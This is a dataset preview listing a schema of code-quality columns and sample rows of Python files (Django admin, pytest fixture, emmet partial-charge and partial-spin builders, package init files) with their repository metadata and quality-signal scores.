Dataset schema (column name and dtype):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
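To poke at records like the ones below, here is a minimal loading sketch with pandas; the parquet filename is a placeholder, since this preview does not name the underlying file:

```python
import pandas as pd

# Placeholder path; the preview does not say how the split is stored on disk.
df = pd.read_parquet("sample.parquet")

# Columns mirror the schema above: repo metadata, the raw file `content`,
# per-file statistics, `qsc_*_quality_signal` measurements, the 0/1 `qsc_*`
# hit flags, plus `effective` and `hits`.
print(df[["max_stars_repo_name", "size", "hits"]].head())

# Rows where at least one quality filter fired:
flagged = df[df["hits"] > 0]
```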
**Row 1**

- hexsha `aceb3ca7af0e36f3c1861691d61d64290bea1372`, size 126, ext `py`, lang Python
- max_stars: `bridges/admin.py` in `vitale232/InspectionPlanner` @ `4d9c9b494e6b3587eb182e9c34ea3d6aee5546e8`, licenses `["MIT"]`, count 1, events 2020-01-30T12:32:38.000Z to 2020-01-30T12:32:38.000Z
- max_issues: same path/repo/head, licenses `["MIT"]`, count 45, events 2019-07-27T02:12:11.000Z to 2022-03-02T04:59:15.000Z
- max_forks: same path/repo/head, licenses `["MIT"]`, count null, events null to null
- content:

```python
from django.contrib.gis import admin
from .models import NewYorkBridge
admin.site.register(NewYorkBridge, admin.OSMGeoAdmin)
```

- avg_line_length 25.2, max_line_length 53, alphanum_fraction 0.84127
- quality signals (`qsc_code_`/`qsc_codepython_` prefixes and `_quality_signal` suffix dropped here and in later rows; signals not listed are 0): num_words 16, num_chars 126, mean_word_length 6.625, frac_words_unique 0.6875, frac_chars_top_2grams 0.339623, frac_chars_whitespace 0.087302, size_file_byte 126, num_lines 4, num_chars_line_max 54, num_chars_line_mean 31.5, frac_chars_alphabet 0.921739, cate_ast 1, cate_var_zero true, frac_lines_import 0.666667, score_lines_no_logic 0.666667
- hit flags (`qsc_*` columns; flags not listed are 0): num_words 1, frac_chars_top_2grams 1, num_lines 1, cate_var_zero 1, frac_lines_import 1, score_lines_no_logic 1; frac_words_unique and frac_lines_string_concat are null
- effective `0`, hits 6
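The `qsc_code_*` measurements can be sanity-checked against Row 1's content. A sketch, with two assumptions that are mine rather than documented definitions: words are taken to be alphanumeric runs, and one blank line is assumed between the imports and the `register` call (that is what makes `num_chars` 126 and `num_lines` 4):

```python
import re

# Row 1's content; the blank line is an assumption consistent with
# num_chars == 126 and num_lines == 4 in the record above.
content = (
    "from django.contrib.gis import admin\n"
    "from .models import NewYorkBridge\n"
    "\n"
    "admin.site.register(NewYorkBridge, admin.OSMGeoAdmin)\n"
)

words = re.findall(r"[A-Za-z0-9]+", content)   # word = alphanumeric run (assumed)
num_chars = len(content)                                               # 126
num_words = len(words)                                                 # 16
mean_word_length = sum(map(len, words)) / num_words                    # 6.625
frac_words_unique = len(set(words)) / num_words                        # 0.6875
frac_chars_whitespace = sum(c.isspace() for c in content) / num_chars  # ~0.087302
alphanum_fraction = sum(c.isalnum() for c in content) / num_chars      # ~0.841270
num_lines = len(content.splitlines())                                  # 4
```

Under those assumptions the sketch reproduces the row's num_words, mean_word_length, frac_words_unique, frac_chars_whitespace, and alphanum_fraction exactly.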
**Row 2**

- hexsha `c5bfcca5b980e86cce3ae40ee9a832de9538723e`, size 171, ext `py`, lang Python
- max_stars: `tests/conftest.py` in `Shinichi-Nakagawa/streamlit-sample-ohtani-san` @ `45847caef82eadf0c30cb33b1a9cf65f1518a339`, licenses `["MIT"]`, count null, events null to null
- max_issues: same path/repo/head, licenses `["MIT"]`, count null, events null to null
- max_forks: same path/repo/head, licenses `["MIT"]`, count 1, events 2021-11-01T14:31:36.000Z to 2021-11-01T14:31:36.000Z
- content:

```python
import pytest
import pandas as pd
from interfaces.ml import DataFrame
@pytest.fixture
def df() -> DataFrame:
return pd.read_csv('./tests/dataset/test_dataset.csv')
```

- avg_line_length 17.1, max_line_length 58, alphanum_fraction 0.754386
- quality signals (not listed = 0): num_words 25, num_chars 171, mean_word_length 5.08, frac_words_unique 0.72, frac_chars_whitespace 0.140351, size_file_byte 171, num_lines 9, num_chars_line_max 59, num_chars_line_mean 19, frac_chars_alphabet 0.863946, frac_chars_string_length 0.187135, frac_chars_long_word_length 0.187135, cate_ast 1, frac_lines_func_ratio 0.166667, cate_var_zero true, frac_lines_import 0.5, frac_lines_simplefunc 0.166667, score_lines_no_logic 0.833333
- hit flags (not listed = 0): num_words 1, num_lines 1, cate_var_zero 1, frac_lines_import 1, frac_lines_simplefunc 1, score_lines_no_logic 1; frac_words_unique and frac_lines_string_concat are null
- effective `0`, hits 6
**Row 3**

- hexsha `c5d3ad73d1b7648e9587edf1e6b048d929e6e908`, size 17,192, ext `py`, lang Python
- max_stars: `emmet-builders/emmet/builders/molecules/atomic.py` in `acrutt/emmet` @ `e98100c9932f145a3ad3087ddb7aa9b779d9a191`, licenses `["BSD-3-Clause-LBNL"]`, count null, events null to null
- max_issues: same path/repo/head, licenses `["BSD-3-Clause-LBNL"]`, count null, events null to null
- max_forks: same path/repo/head, licenses `["BSD-3-Clause-LBNL"]`, count null, events null to null
- content:

```python
from datetime import datetime
from itertools import chain
from math import ceil
from typing import Optional, Iterable, Iterator, List, Dict
from maggma.builders import Builder
from maggma.core import Store
from maggma.utils import grouper
from emmet.core.qchem.task import TaskDocument
from emmet.core.qchem.molecule import MoleculeDoc, evaluate_lot
from emmet.core.molecules.atomic import (
PartialChargesDoc,
PartialSpinsDoc,
CHARGES_METHODS,
SPINS_METHODS,
)
from emmet.core.utils import jsanitize
from emmet.builders.settings import EmmetBuildSettings
__author__ = "Evan Spotte-Smith"
SETTINGS = EmmetBuildSettings()
class PartialChargesBuilder(Builder):
"""
The PartialChargesBuilder extracts partial charges data from a MoleculeDoc.
Various methods can be used to define partial charges, including:
- Mulliken
- Restrained Electrostatic Potential (RESP)
- Critic2
- Natural Bonding Orbital (NBO) population analysis
This builder will attempt to build documents for each molecule with each method.
For each molecule-method combination, the highest-quality data available (based
on level of theory and electronic energy) will be used.
The process is as follows:
1. Gather MoleculeDocs by formula
2. For each molecule, sort all associated tasks by level of theory and electronic energy
2. For each method:
2.1. Find task docs with necessary data to calculate partial charges by that method
2.2. Take best (defined by level of theory and electronic energy) task
2.3. Convert TaskDoc to PartialChargesDoc
"""
def __init__(
self,
tasks: Store,
molecules: Store,
charges: Store,
query: Optional[Dict] = None,
methods: Optional[List] = None,
settings: Optional[EmmetBuildSettings] = None,
**kwargs,
):
self.tasks = tasks
self.molecules = molecules
self.charges = charges
self.query = query if query else dict()
self.methods = methods if methods else CHARGES_METHODS
self.settings = EmmetBuildSettings.autoload(settings)
self.kwargs = kwargs
super().__init__(sources=[tasks, molecules], targets=[charges])
def ensure_indexes(self):
"""
Ensures indices on the collections needed for building
"""
# Basic search index for tasks
self.tasks.ensure_index("task_id")
self.tasks.ensure_index("last_updated")
self.tasks.ensure_index("state")
self.tasks.ensure_index("formula_alphabetical")
# Search index for molecules
self.molecules.ensure_index("molecule_id")
self.molecules.ensure_index("last_updated")
self.molecules.ensure_index("task_ids")
self.molecules.ensure_index("formula_alphabetical")
# Search index for charges
self.charges.ensure_index("molecule_id")
self.charges.ensure_index("method")
self.charges.ensure_index("task_id")
self.charges.ensure_index("last_updated")
self.charges.ensure_index("formula_alphabetical")
def prechunk(self, number_splits: int) -> Iterable[Dict]: # pragma: no cover
"""Prechunk the builder for distributed computation"""
temp_query = dict(self.query)
temp_query["deprecated"] = False
self.logger.info("Finding documents to process")
all_mols = list(
self.molecules.query(
temp_query, [self.molecules.key, "formula_alphabetical"]
)
)
processed_docs = set([e for e in self.charges.distinct("molecule_id")])
to_process_docs = {d[self.molecules.key] for d in all_mols} - processed_docs
to_process_forms = {
d["formula_alphabetical"]
for d in all_mols
if d[self.molecules.key] in to_process_docs
}
N = ceil(len(to_process_forms) / number_splits)
for formula_chunk in grouper(to_process_forms, N):
yield {"query": {"formula_alphabetical": {"$in": list(formula_chunk)}}}
def get_items(self) -> Iterator[List[Dict]]:
"""
Gets all items to process into partial charges documents.
This does no datetime checking; relying on on whether
task_ids are included in the charges Store
Returns:
generator or list relevant tasks and molecules to process into documents
"""
self.logger.info("Partial charges builder started")
self.logger.info("Setting indexes")
self.ensure_indexes()
# Save timestamp to mark buildtime
self.timestamp = datetime.utcnow()
# Get all processed molecules
temp_query = dict(self.query)
temp_query["deprecated"] = False
self.logger.info("Finding documents to process")
all_mols = list(
self.molecules.query(
temp_query, [self.molecules.key, "formula_alphabetical"]
)
)
processed_docs = set([e for e in self.charges.distinct("molecule_id")])
to_process_docs = {d[self.molecules.key] for d in all_mols} - processed_docs
to_process_forms = {
d["formula_alphabetical"]
for d in all_mols
if d[self.molecules.key] in to_process_docs
}
self.logger.info(f"Found {len(to_process_docs)} unprocessed documents")
self.logger.info(f"Found {len(to_process_forms)} unprocessed formulas")
# Set total for builder bars to have a total
self.total = len(to_process_forms)
for formula in to_process_forms:
mol_query = dict(temp_query)
mol_query["formula_alphabetical"] = formula
molecules = list(self.molecules.query(criteria=mol_query))
yield molecules
def process_item(self, items: List[Dict]) -> List[Dict]:
"""
Process the tasks into PartialChargesDocs
Args:
tasks List[Dict] : a list of MoleculeDocs in dict form
Returns:
[dict] : a list of new partial charges docs
"""
mols = [MoleculeDoc(**item) for item in items]
formula = mols[0].formula_alphabetical
mol_ids = [m.molecule_id for m in mols]
self.logger.debug(f"Processing {formula} : {mol_ids}")
charges_docs = list()
for mol in mols:
correct_charge_spin = [
e
for e in mol.entries
if e["charge"] == mol.charge
and e["spin_multiplicity"] == mol.spin_multiplicity
]
sorted_entries = sorted(
correct_charge_spin,
key=lambda x: (sum(evaluate_lot(x["level_of_theory"])), x["energy"]),
)
for method in self.methods:
# For each method, grab entries that have the relevant data
relevant_entries = [
e
for e in sorted_entries
if e.get(method) is not None or e["output"].get(method) is not None
]
if len(relevant_entries) == 0:
continue
# Grab task document of best entry
best_entry = relevant_entries[0]
task = best_entry["task_id"]
task_doc = TaskDocument(**self.tasks.query_one({"task_id": int(task)}))
doc = PartialChargesDoc.from_task(
task_doc,
molecule_id=mol.molecule_id,
preferred_methods=[method],
deprecated=False,
)
charges_docs.append(doc)
self.logger.debug(f"Produced {len(charges_docs)} charges docs for {formula}")
return jsanitize([doc.dict() for doc in charges_docs], allow_bson=True)
def update_targets(self, items: List[List[Dict]]):
"""
Inserts the new documents into the charges collection
Args:
items [[dict]]: A list of documents to update
"""
docs = list(chain.from_iterable(items)) # type: ignore
# Add timestamp
for item in docs:
item.update(
{
"_bt": self.timestamp,
}
)
molecule_ids = list({item["molecule_id"] for item in docs})
if len(items) > 0:
self.logger.info(f"Updating {len(docs)} partial charges documents")
self.charges.remove_docs({self.charges.key: {"$in": molecule_ids}})
# Neither molecule_id nor method need to be unique, but the combination must be
self.charges.update(
docs=docs,
key=["molecule_id", "method"],
)
else:
self.logger.info("No items to update")
class PartialSpinsBuilder(Builder):
"""
The PartialSpinsBuilder extracts partial spin data from a MoleculeDoc.
Various methods can be used to define partial atomic spins, including:
- Mulliken
- Natural Bonding Orbital (NBO) population analysis
This builder will attempt to build documents for each molecule with each method.
For each molecule-method combination, the highest-quality data available (based
on level of theory and electronic energy) will be used.
The process is as follows:
1. Gather MoleculeDocs by formula
2. For each molecule, sort all associated tasks by level of theory and electronic energy
2. For each method:
2.1. Find task docs with necessary data to calculate partial spins by that method
2.2. Take best (defined by level of theory and electronic energy) task
2.3. Convert TaskDoc to PartialChargesDoc
"""
def __init__(
self,
tasks: Store,
molecules: Store,
spins: Store,
query: Optional[Dict] = None,
methods: Optional[List] = None,
settings: Optional[EmmetBuildSettings] = None,
**kwargs,
):
self.tasks = tasks
self.molecules = molecules
self.spins = spins
self.query = query if query else dict()
self.methods = methods if methods else SPINS_METHODS
self.settings = EmmetBuildSettings.autoload(settings)
self.kwargs = kwargs
super().__init__(sources=[tasks, molecules], targets=[spins])
def ensure_indexes(self):
"""
Ensures indices on the collections needed for building
"""
# Basic search index for tasks
self.tasks.ensure_index("task_id")
self.tasks.ensure_index("last_updated")
self.tasks.ensure_index("state")
self.tasks.ensure_index("formula_alphabetical")
# Search index for molecules
self.molecules.ensure_index("molecule_id")
self.molecules.ensure_index("last_updated")
self.molecules.ensure_index("task_ids")
self.molecules.ensure_index("formula_alphabetical")
# Search index for charges
self.spins.ensure_index("molecule_id")
self.spins.ensure_index("method")
self.spins.ensure_index("task_id")
self.spins.ensure_index("last_updated")
self.spins.ensure_index("formula_alphabetical")
def prechunk(self, number_splits: int) -> Iterable[Dict]: # pragma: no cover
"""Prechunk the builder for distributed computation"""
temp_query = dict(self.query)
temp_query["deprecated"] = False
self.logger.info("Finding documents to process")
all_mols = list(
self.molecules.query(
temp_query, [self.molecules.key, "formula_alphabetical"]
)
)
processed_docs = set([e for e in self.spins.distinct("molecule_id")])
to_process_docs = {d[self.molecules.key] for d in all_mols} - processed_docs
to_process_forms = {
d["formula_alphabetical"]
for d in all_mols
if d[self.molecules.key] in to_process_docs
}
N = ceil(len(to_process_forms) / number_splits)
for formula_chunk in grouper(to_process_forms, N):
yield {"query": {"formula_alphabetical": {"$in": list(formula_chunk)}}}
def get_items(self) -> Iterator[List[Dict]]:
"""
Gets all items to process into partial spins documents.
This does no datetime checking; relying on on whether
task_ids are included in the spins Store
Returns:
generator or list relevant tasks and molecules to process into documents
"""
self.logger.info("Partial spins builder started")
self.logger.info("Setting indexes")
self.ensure_indexes()
# Save timestamp to mark buildtime
self.timestamp = datetime.utcnow()
# Get all processed molecules
temp_query = dict(self.query)
temp_query["deprecated"] = False
self.logger.info("Finding documents to process")
all_mols = list(
self.molecules.query(
temp_query, [self.molecules.key, "formula_alphabetical"]
)
)
processed_docs = set([e for e in self.spins.distinct("molecule_id")])
to_process_docs = {d[self.molecules.key] for d in all_mols} - processed_docs
to_process_forms = {
d["formula_alphabetical"]
for d in all_mols
if d[self.molecules.key] in to_process_docs
}
self.logger.info(f"Found {len(to_process_docs)} unprocessed documents")
self.logger.info(f"Found {len(to_process_forms)} unprocessed formulas")
# Set total for builder bars to have a total
self.total = len(to_process_forms)
for formula in to_process_forms:
mol_query = dict(temp_query)
mol_query["formula_alphabetical"] = formula
molecules = list(self.molecules.query(criteria=mol_query))
yield molecules
def process_item(self, items: List[Dict]) -> List[Dict]:
"""
Process the tasks into PartialSpinsDocs
Args:
tasks List[Dict] : a list of MoleculeDocs in dict form
Returns:
[dict] : a list of new partial spins docs
"""
mols = [MoleculeDoc(**item) for item in items]
formula = mols[0].formula_alphabetical
mol_ids = [m.molecule_id for m in mols]
self.logger.debug(f"Processing {formula} : {mol_ids}")
spins_docs = list()
for mol in mols:
# Molecule with spin multiplicity 1 has no partial spins
if mol.spin_multiplicity == 1:
continue
correct_charge_spin = [
e
for e in mol.entries
if e["charge"] == mol.charge
and e["spin_multiplicity"] == mol.spin_multiplicity
]
sorted_entries = sorted(
correct_charge_spin,
key=lambda x: (sum(evaluate_lot(x["level_of_theory"])), x["energy"]),
)
for method in self.methods:
# For each method, grab entries that have the relevant data
relevant_entries = [
e
for e in sorted_entries
if e.get(method) is not None or e["output"].get(method) is not None
]
if len(relevant_entries) == 0:
continue
# Grab task document of best entry
best_entry = relevant_entries[0]
task = best_entry["task_id"]
task_doc = TaskDocument(**self.tasks.query_one({"task_id": int(task)}))
doc = PartialSpinsDoc.from_task(
task_doc,
molecule_id=mol.molecule_id,
preferred_methods=[method],
deprecated=False,
)
spins_docs.append(doc)
self.logger.debug(
f"Produced {len(spins_docs)} partial spins docs for {formula}"
)
return jsanitize([doc.dict() for doc in spins_docs], allow_bson=True)
def update_targets(self, items: List[List[Dict]]):
"""
Inserts the new documents into the spins collection
Args:
items [[dict]]: A list of documents to update
"""
docs = list(chain.from_iterable(items)) # type: ignore
# Add timestamp
for item in docs:
item.update(
{
"_bt": self.timestamp,
}
)
molecule_ids = list({item["molecule_id"] for item in docs})
if len(items) > 0:
self.logger.info(f"Updating {len(docs)} partial spins documents")
self.spins.remove_docs({self.spins.key: {"$in": molecule_ids}})
# Neither molecule_id nor method need to be unique, but the combination must be
self.spins.update(
docs=docs,
key=["molecule_id", "method"],
)
else:
self.logger.info("No items to update")
```

- avg_line_length 34.315369, max_line_length 96, alphanum_fraction 0.602257
- quality signals (not listed = 0): num_words 2,001, num_chars 17,192, mean_word_length 5.033483, frac_words_unique 0.125437, frac_chars_top_2grams 0.028594, frac_chars_top_3grams 0.02224, frac_chars_top_4grams 0.015886, frac_chars_dupe_5grams 0.874106, frac_chars_dupe_6grams 0.855242, frac_chars_dupe_7grams 0.851271, frac_chars_dupe_8grams 0.851271, frac_chars_dupe_9grams 0.851271, frac_chars_dupe_10grams 0.843328, frac_chars_digital 0.002451, frac_chars_whitespace 0.311831, size_file_byte 17,192, num_lines 500, num_chars_line_max 97, num_chars_line_mean 34.384, frac_chars_alphabet 0.848872, frac_chars_comments 0.222138, frac_lines_dupe_lines 0.686007, frac_chars_string_length 0.12146, frac_chars_long_word_length 0.007003, cate_ast 1, frac_lines_func_ratio 0.040956, cate_var_zero false, frac_lines_import 0.040956, score_lines_no_logic 0.095563
- hit flags (not listed = 0): frac_chars_dupe_5grams through frac_chars_dupe_10grams are all 1; frac_words_unique and frac_lines_string_concat are null
- effective `0`, hits 6
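Row 3 illustrates the duplicate-n-gram family well: its two builder classes are near copies of each other, `frac_chars_dupe_5grams` is about 0.874, and the corresponding hit flags fire. A rough sketch of a Gopher-style signal of this kind; the tokenization and the exact overlap accounting are assumptions, not this dataset's documented definition:

```python
import re
from collections import Counter

def frac_chars_dupe_ngrams(text: str, n: int = 5) -> float:
    """Fraction of word characters inside word n-grams that occur more than
    once (Gopher-style sketch; tokenizer and overlap handling are assumed)."""
    words = re.findall(r"\S+", text)
    if len(words) < n:
        return 0.0
    ngrams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
    counts = Counter(ngrams)
    covered = [False] * len(words)
    for i, gram in enumerate(ngrams):
        if counts[gram] > 1:                 # this n-gram appears elsewhere too
            covered[i:i + n] = [True] * n    # mark every word it spans
    dup_chars = sum(len(w) for w, hit in zip(words, covered) if hit)
    total_chars = sum(len(w) for w in words)
    return dup_chars / total_chars if total_chars else 0.0
```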
**Row 4**

- hexsha `c5ff3ba9d8554ff3ea2f46ed0788e2af4b308665`, size 93, ext `py`, lang Python
- max_stars: `src/Creation/__init__.py` in `gr4ph0s/c4d_redshift_light_lister` @ `f227caf32cfd4eb5ed0810b8aedc1dff38ba2262`, licenses `["MIT"]`, count 7, events 2017-12-11T22:38:31.000Z to 2021-05-12T07:27:01.000Z
- max_issues: same path/repo/head, licenses `["MIT"]`, count 1, events 2020-10-23T16:55:06.000Z to 2020-10-27T16:52:04.000Z
- max_forks: same path/repo/head, licenses `["MIT"]`, count 2, events 2019-07-01T07:45:11.000Z to 2021-05-11T16:59:05.000Z
- content:

```python
from .CreationRedshift import CreationRedshift
from .CreationFunction import CreationFunction
```

- avg_line_length 46.5, max_line_length 46, alphanum_fraction 0.903226
- quality signals (not listed = 0): num_words 8, num_chars 93, mean_word_length 10.5, frac_words_unique 0.5, frac_chars_whitespace 0.075269, size_file_byte 93, num_lines 2, num_chars_line_max 47, num_chars_line_mean 46.5, frac_chars_alphabet 0.976744, cate_ast 1, cate_var_zero true, frac_lines_import 1, score_lines_no_logic 1
- hit flags (not listed = 0): mean_word_length 1, num_lines 1, cate_var_zero 1, frac_lines_import 1, score_lines_no_logic 1; frac_words_unique and frac_lines_string_concat are null
- effective `0`, hits 6
**Row 5**

- hexsha `a83f7be502c15db872f63fd8c2054d11d5e4322a`, size 205, ext `py`, lang Python
- max_stars: `PokerRL/rl/neural/__init__.py` in `MAWUT0R/PokerRL` @ `95708a5f7a16cb151bc4253132bdfd22ea7a9b25`, licenses `["MIT"]`, count 247, events 2019-06-20T16:41:36.000Z to 2022-03-28T11:40:12.000Z
- max_issues: same path/repo/head, licenses `["MIT"]`, count 11, events 2019-08-23T09:20:31.000Z to 2021-12-05T23:44:27.000Z
- max_forks: same path/repo/head, licenses `["MIT"]`, count 61, events 2019-06-17T06:06:11.000Z to 2022-03-01T17:55:44.000Z
- content:

```python
from .MainPokerModuleFLAT import *
from .MainPokerModuleRNN import *
from .AvrgStrategyNet import *
from .AdvantageNet import *
from .DuelingQNet import *
from .NetWrapperBase import *
from .QNet import *
```

- avg_line_length 25.625, max_line_length 34, alphanum_fraction 0.795122
- quality signals (not listed = 0): num_words 21, num_chars 205, mean_word_length 7.761905, frac_words_unique 0.428571, frac_chars_top_2grams 0.368098, frac_chars_whitespace 0.136585, size_file_byte 205, num_lines 7, num_chars_line_max 35, num_chars_line_mean 29.285714, frac_chars_alphabet 0.920904, cate_ast 1, cate_var_zero true, frac_lines_import 1, score_lines_no_logic 1
- hit flags (not listed = 0): num_words 1, frac_chars_top_2grams 1, num_lines 1, cate_var_zero 1, frac_lines_import 1, score_lines_no_logic 1; frac_words_unique and frac_lines_string_concat are null
- effective `0`, hits 6
**Row 6**

- hexsha `a84c6fb83bbb57b6b2024a708b2a88b18722bc39`, size 121, ext `py`, lang Python
- max_stars: `p2016_05_28_python_path_find/child/main.py` in `zhyq0826/blog-code` @ `4369d653dea4a7a054dc796d14faea727973258f`, licenses `["MIT"]`, count 1, events 2018-07-07T14:35:55.000Z to 2018-07-07T14:35:55.000Z
- max_issues: same path/repo/head, licenses `["MIT"]`, count null, events null to null
- max_forks: same path/repo/head, licenses `["MIT"]`, count null, events null to null
- content:

```python
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
if __name__ == '__main__':
pass
```

- avg_line_length 17.285714, max_line_length 62, alphanum_fraction 0.719008
- quality signals (not listed = 0): num_words 19, num_chars 121, mean_word_length 3.947368, frac_words_unique 0.631579, frac_chars_top_2grams 0.16, frac_chars_top_3grams 0.346667, frac_chars_digital 0.009524, frac_chars_whitespace 0.132231, size_file_byte 121, num_lines 7, num_chars_line_max 63, num_chars_line_mean 17.285714, frac_chars_alphabet 0.704762, frac_chars_string_length 0.065574, cate_ast 1, cate_var_zero true, frac_lines_pass 0.2, frac_lines_import 0.4, score_lines_no_logic 0.4
- hit flags (not listed = 0): num_words 1, frac_chars_top_3grams 1, num_lines 1, cate_var_zero 1, frac_lines_pass 1, frac_lines_import 1; frac_words_unique and frac_lines_string_concat are null
- effective `0`, hits 6
**Row 7**

- hexsha `a88c1349c9d9c6d76d1845390f2f69ffc71b827d`, size 96, ext `py`, lang Python
- max_stars: `venv/lib/python3.8/site-packages/pip/_internal/cli/base_command.py` in `GiulianaPola/select_repeats` @ `17a0d053d4f874e42cf654dd142168c2ec8fbd11`, licenses `["MIT"]`, count 2, events 2022-03-13T01:58:52.000Z to 2022-03-31T06:07:54.000Z
- max_issues: same path in `DesmoSearch/Desmobot` @ `b70b45df3485351f471080deb5c785c4bc5c4beb`, licenses `["MIT"]`, count 19, events 2021-11-20T04:09:18.000Z to 2022-03-23T15:05:55.000Z
- max_forks: same path in `DesmoSearch/Desmobot` @ `b70b45df3485351f471080deb5c785c4bc5c4beb`, licenses `["MIT"]`, count null, events null to null
- content (not Python source; the file holds a pip cache pool path):

```
/home/runner/.cache/pip/pool/76/6b/dd/3585dc52fdc12b27f32d565b257ad6a3a19cf8f322d909832fbe75f6f9
```

- avg_line_length 96, max_line_length 96, alphanum_fraction 0.895833
- quality signals (not listed = 0): num_words 9, num_chars 96, mean_word_length 9.555556, frac_words_unique 1, frac_chars_digital 0.40625, size_file_byte 96, num_lines 1, num_chars_line_max 96, num_chars_line_mean 96, frac_chars_alphabet 0.489583, cate_encoded_data 1; cate_ast 0, and the remaining Python-AST signals (frac_lines_func_ratio, cate_var_zero, frac_lines_simplefunc, score_lines_no_logic) are null
- hit flags (not listed = 0): num_words 1, frac_chars_digital 1, num_lines 1, frac_chars_alphabet 1, cate_encoded_data 1, cate_ast 1; frac_words_unique and frac_lines_string_concat are null
- effective `0`, hits 6
**Row 8**

- hexsha `76458797d451edce979b10e65894b7651e98be69`, size 42, ext `py`, lang Python
- max_stars: `hrnet_pose/__init__.py` in `ovs-code/HRNet-Human-Pose-Estimation` @ `ddba0bd95a96bc9e95183af5ad172cb7c1fb24e8`, licenses `["MIT"]`, count null, events null to null
- max_issues: same path/repo/head, licenses `["MIT"]`, count null, events null to null
- max_forks: same path/repo/head, licenses `["MIT"]`, count null, events null to null
- content:

```python
from . import config, core, models, utils
```

- avg_line_length 21, max_line_length 41, alphanum_fraction 0.738095
- quality signals (not listed = 0): num_words 6, num_chars 42, mean_word_length 5.166667, frac_words_unique 1, frac_chars_whitespace 0.166667, size_file_byte 42, num_lines 1, num_chars_line_max 42, num_chars_line_mean 42, frac_chars_alphabet 0.885714, cate_ast 1, cate_var_zero true, frac_lines_import 1, score_lines_no_logic 1
